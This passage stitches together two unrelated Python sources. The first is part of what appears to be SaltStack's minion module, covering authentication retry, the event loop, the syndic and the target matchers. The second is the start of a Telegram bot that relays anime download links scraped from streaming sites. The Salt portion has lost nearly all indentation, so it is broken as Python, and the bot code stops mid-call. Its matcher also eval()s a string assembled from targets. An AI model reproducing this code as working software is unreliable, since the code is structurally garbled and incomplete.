'{0}. This is often due to the master being shut down or '
                   'overloaded. If the master is running, consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
if isinstance(ret_val, string_types) and not ret_val:
# The master AES key has changed, reauth
self.authenticate()
ret_val = sreq.send('aes', self.crypticle.dumps(load))
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
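    # Illustrative minion config for the startup-state hook above (the state
    # names are invented for the example; only the option keys come from this
    # code):
    #
    #   startup_states: sls
    #   sls_list:
    #     - edit.vim
    #     - hyper
    #
    # 'top' uses top_file instead, and any other truthy value runs a full
    # state.highstate.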
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
            if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
        Authenticate with the master. This method breaks the functional
        paradigm: it updates the master information from a fresh sign-in.
        Signing in can occur as often as needed to keep up with the
        revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds != 'retry':
log.info('Authentication with master successful!')
break
log.info('Waiting for minion key to be accepted by the master.')
if acceptance_wait_time:
log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
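    # Rough sketch of the retry backoff above, assuming example values of
    # acceptance_wait_time=10 and acceptance_wait_time_max=60 (neither value
    # is mandated by this code): the delay between sign-in attempts grows
    # 10 -> 20 -> 40 -> 80 seconds and then stops growing, because the delay
    # only doubles while it is still below the configured maximum. If the
    # maximum is unset it defaults to the initial wait, so the delay stays
    # constant.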
def module_refresh(self):
'''
Refresh the functions and returners.
'''
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
        Python does not handle SIGTERM cleanly on its own; if the signal is
        received, exit the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
loop_interval = int(self.opts['loop_interval'])
try:
            if self.opts['grains_refresh_every']:  # If set and non-zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
log.debug('Handling event {0!r}'.format(package))
try:
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh()
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
                # Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
                # The interrupt caused by python handling the
                # SIGCHLD raises this error with errno == EINTR.
                # Having nothing to receive on the zmq socket raises this
                # error with EAGAIN.
                # Both are safe to ignore.
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts):
self._syndic_interface = opts.get('interface')
self._syndic = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'to' not in data or 'arg' not in data:
return
data['to'] = int(data['to']) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'])
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self.context = zmq.Context()
# Start with the publish socket
# Share the poller with the event object
self.poller = self.local.event.poller
self.socket = self.context.socket(zmq.SUB)
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
            # We don't handle ZMQErrors like the other minions do;
            # explicit handling has been put around the receive calls
            # in the process_*_socket methods. If we see any other
            # errors they may need some kind of handling, so log them
            # for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
                # EAGAIN indicates there are no more events at the moment.
                # EINTR means some kind of signal arrived, perhaps someone
                # trying to get us to quit, so escape our timeout.
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event %s', event['tag'])
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.is_jid(event['tag']) and 'return' in event['data']:
                if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
                if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
        # We borrowed the local client's poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class Matcher(object):
'''
    Used to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
if functions is None:
functions = salt.loader.minion_mods(self.opts)
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
        if not isinstance(tgt, str):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delim=':'):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt, delim=delim)
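    # Hedged example of the glob-style grain match above: with grains such as
    # {'os': 'Ubuntu', 'roles': ['web', 'db']} (values invented for
    # illustration), targets like 'os:Ubu*' or 'roles:web' would match via
    # salt.utils.subdict_match using ':' as the key/value delimiter.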
def grain_pcre_match(self, tgt, delim=':'):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delim=delim, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def exsel_match(self, tgt):
'''
        Runs a function and returns the exit code
'''
if tgt not in self.functions:
return False
return self.functions[tgt]()
def pillar_match(self, tgt, delim=':'):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'], tgt, delim=delim)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
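    # Hedged example for ipcidr_match: a target of '10.0.0.0/24' matches when
    # any address in grains['ipv4'] falls inside that subnet, a bare
    # '10.0.0.5' must appear verbatim in grains['ipv4'], and anything with
    # more than one '/' is rejected outright. The addresses are illustrative.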
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
            # the 'G, P, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
                    # sequence starts with an operator, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
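    # Worked example of the compound matcher above (grain values invented for
    # illustration): the target "G@os:Ubuntu and web* or E@db.*" is split on
    # whitespace, 'G@os:Ubuntu' dispatches to grain_match, 'E@db.*' to
    # pcre_match, the bare 'web*' falls through to glob_match, and the
    # 'and'/'or' tokens are kept as-is, yielding a string such as
    # "True and True or False" that is then eval()'d to a boolean.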
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
        # Late setup of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules()
|
animehive.py
|
import os
import json
import datetime
import threading
from multiprocessing import Pool
import pymongo
import telegram
from telegram import KeyboardButton, ReplyKeyboardMarkup
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import CallbackQueryHandler
from telegram.ext import MessageHandler, Filters
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from extras import *
with open("config.json") as config_file:
    config = json.load(config_file)
bot = telegram.Bot(token=config["token"])
updater = Updater(token=config["token"], use_context=True)
dispatcher = updater.dispatcher
client = pymongo.MongoClient(config["db"]["host"], config["db"]["port"])
db = client[config["db"]["db_name"]]
def launch_broadcast(args):
try:
bot.send_message(chat_id=args[0], text=args[1])
    except Exception:
        pass
def latest_anime(context, chat_id):
anime_list = fetch_gogoanime_latest()
for anime in anime_list:
try:
markup = [[InlineKeyboardButton(
"Download Anime 🚀", callback_data="d=" + anime["href"])]]
context.bot.send_photo(
chat_id=chat_id, caption=f"{anime['name']} {anime['episode']}", photo=anime["image"], reply_markup=InlineKeyboardMarkup(markup))
        except Exception:
            pass
def echo_thread(update, context):
chat_id = update.effective_chat.id
bot_user = db.users.find_one({"chat_id": chat_id})
last_command = bot_user["last_command"]
if last_command == "recommend":
title = update.message.text.strip()
anime_list = search_animepahe(title)
if len(anime_list) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_search"])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"])
else:
context.bot.send_message(
chat_id=chat_id, text="Displaying search results for {} 😁".format(title))
for anime in anime_list:
markup = [[InlineKeyboardButton(
"Get Recommendations 🚀", callback_data="r=" + anime["session"])]]
context.bot.send_photo(chat_id=chat_id, photo=anime["poster"], caption=config["messages"]["recommendation_search"].format(
anime["title"], anime["type"], anime["status"], "{} {}".format(anime["season"], anime["year"])), reply_markup=InlineKeyboardMarkup(markup))
elif last_command == "download":
title = update.message.text.strip()
anime_list = search_gogoanime(title)
if len(anime_list) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_search"])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"])
else:
context.bot.send_message(
chat_id=chat_id, text="Displaying search results for {} 😁".format(title))
for anime in anime_list:
try:
markup = [[InlineKeyboardButton(
"Get Episodes 🚀", callback_data="d=" + anime["href"])]]
context.bot.send_photo(
chat_id=chat_id, caption=f"{anime['title']}\n{anime['released']}", photo=anime["image"], reply_markup=InlineKeyboardMarkup(markup))
                except Exception:
                    pass
elif last_command == "get_info":
title = update.message.text.strip()
anime_list = search_animepahe(title)
if len(anime_list) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_search"])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["menu"])
else:
for anime in anime_list:
markup = [[InlineKeyboardButton(
"Get Anime Info ℹ️", callback_data="i=" + anime["session"])]]
context.bot.send_photo(chat_id=chat_id, photo=anime["poster"], caption=config["messages"]["recommendation_result"].format(
anime["title"], anime["status"], "{} {}".format(anime["season"], anime["year"])), reply_markup=InlineKeyboardMarkup(markup))
elif last_command == "broadcast":
if bot_user.get("admin"):
message = update.message.text
users = [[i["chat_id"], message] for i in db.users.find({})]
with Pool(5) as p:
result = p.map(launch_broadcast, users)
bot.send_message(
chat_id=chat_id, text="Finished sending broadcast message to users")
else:
if bot_user.get("admin"):
context.bot.send_message(chat_id=chat_id, text=update.message.text)
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["unknown"])
db.users.update_one({"chat_id": chat_id}, {"$set": {"last_command": None}})
def button_thread(update, context):
chat_id = update.effective_chat.id
query_data = update.callback_query.data
if query_data.split("=")[0] == "r":
try:
title, recommendations = fetch_animepahe_recommendations(
query_data.split("=")[1])
if len(recommendations) == 0:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_recommendation"])
else:
db.recommendations.insert_many([{"chat_id": chat_id, "anime": query_data.split("=")[
1], "session": i["session"], "date": datetime.datetime.now()} for i in recommendations])
context.bot.send_message(
chat_id=chat_id, text="Showing recommendations for {} 😇".format(title))
for i in recommendations:
markup = [[InlineKeyboardButton(
"Get Anime Info ℹ️", callback_data="i=" + i["session"])]]
context.bot.send_photo(chat_id=chat_id, photo=i["image"], caption=config["messages"]["recommendation_result"].format(
i["title"], i["status"], i["season"]), reply_markup=InlineKeyboardMarkup(markup))
        except Exception:
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["empty_recommendation"])
if query_data.split("=")[0] == "d":
total_episodes, alias, anime_id = fetch_gogoanime_anime(
query_data.split("=")[1])
markup = []
for i in range(0, total_episodes, 10):
markup.append([InlineKeyboardButton("Download Episodes {} - {}".format(i + 1, min(
i + 10, total_episodes)), callback_data="f={}={}={}".format(alias, anime_id, i))])
context.bot.send_message(chat_id=chat_id, text=config["messages"]["download_pagination"].format(
total_episodes), reply_markup=InlineKeyboardMarkup(markup))
if query_data.split("=")[0] == "f":
start = int(query_data.split("=")[3])
alias = query_data.split("=")[1]
episodes = fetch_gogoanime_episodes(
start, start + 10, alias, query_data.split("=")[2])
markup = []
for i in episodes:
markup.append([InlineKeyboardButton(os.path.basename(i["href"]).replace(
"-", " "), callback_data="g={}".format(i["href"]))])
context.bot.send_message(
chat_id=chat_id, text=config["messages"]["select_episode"], reply_markup=InlineKeyboardMarkup(markup))
if query_data.split("=")[0] == "g":
anime_title, download_links = fetch_gogoanime_download(
query_data.split("=")[1])
db.downloaded_anime.insert_one({
"title": anime_title,
"chat_id": chat_id,
"href": "https://gogoanime.so" + query_data.split("=")[1],
"date": datetime.datetime.now()
})
markup = []
for i in download_links:
markup.append([InlineKeyboardButton(i["name"], url=i["href"])])
context.bot.send_message(
